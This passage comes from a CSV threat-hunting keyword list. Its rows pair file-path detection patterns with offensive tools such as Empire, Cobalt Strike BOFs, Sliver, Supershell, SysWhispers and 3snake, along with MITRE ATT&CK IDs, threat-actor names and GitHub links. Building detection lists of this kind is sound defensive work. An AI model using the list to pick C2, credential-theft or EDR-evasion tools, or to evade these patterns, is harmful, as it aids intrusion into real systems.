T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1066","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/stagers/CSharpPS*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/start_campaign.py*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*/StaticSyscallsAPCSpawn/*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*/StaticSyscallsInject/*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*/StayKit.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*/Staykit/StayKit.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*/stinger_client.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*/striker.c","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" +"*/Striker.git*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" +"*/striker.local*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" +"*/striker.py","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*/string_of_paerls.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*/stun-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/stun-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/stuxnet-detect.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/subdomain.yaml*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*/subdomains.txt*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*/subdomains-10000.txt*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" +"*/Suborner.git*","offensive_tool_keyword","Suborner","The Invisible Account Forger - A simple program to create a Windows account you will only know about ","T1098 - T1175 - T1033","TA0007 - TA0008 - TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/Suborner","1","1","N/A","N/A","5","452","58","2022-09-02T09:04:46Z","2022-04-26T00:12:58Z" +"*/sudo_tracer.c*","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","0","N/A","7","7","688","114","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" +"*/sudomy.api*","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","N/A","N/A","10","1720","352","2023-09-19T08:38:55Z","2019-07-26T10:26:34Z" +"*/sullo/nikto*","offensive_tool_keyword","nikto","Nikto web scanner tool","T1210.001 - T1190 - T1046 - T1222","TA0007 - TA0002 - TA0001","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7136","1096","2023-09-18T14:44:28Z","2012-11-24T04:24:29Z" +"*/sunlogin_rce*","offensive_tool_keyword","POC","SunloginClient RCE vulnerable version","T1587","TA0001 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/sunlogin_rce","1","1","N/A","N/A","5","462","201","2022-02-16T16:11:42Z","2022-02-16T14:20:41Z" +"*/Sup3r-Us3r/scripts/*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl","1","1","N/A","7","10","N/A","N/A","N/A","N/A" +"*/supermicro-ipmi-conf.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/Supernova.exe*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","1","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*/Supernova.git*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","1","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*/SuperProfileDLL*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/Supershell.tar.gz*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*/supershell/login/auth*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*/Supershell/releases*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*/suspendresume.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/suspendresume.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/svn-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/SweetPotato_CS*","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","10","10","236","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z" +"*/Synergy-httpx.git*","offensive_tool_keyword","Synergy-httpx","A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically","T1021.002 - T1105 - T1090","TA0002 - TA0011 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/t3l3machus/Synergy-httpx","1","1","N/A","8","2","108","14","2023-09-09T10:38:38Z","2023-06-02T10:06:41Z" +"*/syscalls/syscalls_windows.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/syscalls/syswhispers/*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*/syscalls/syswhispersv2*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*/SyscallsInject/*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*/SysmonQuiet*","offensive_tool_keyword","sysmonquiet","RDLL for Cobalt Strike beacon to silence Sysmon process","T1055 - T1055.012 - T1063","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ScriptIdiot/SysmonQuiet","1","1","N/A","N/A","1","81","15","2022-09-09T12:28:15Z","2022-07-11T14:17:34Z" +"*/SysWhispers2*","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","1","N/A","N/A","10","1006","148","2023-03-22T19:23:21Z","2022-03-07T18:56:21Z" +"*/SysWhispers3*","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","1","N/A","N/A","10","1006","148","2023-03-22T19:23:21Z","2022-03-07T18:56:21Z" +"*/SysWhispers3.git*","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense 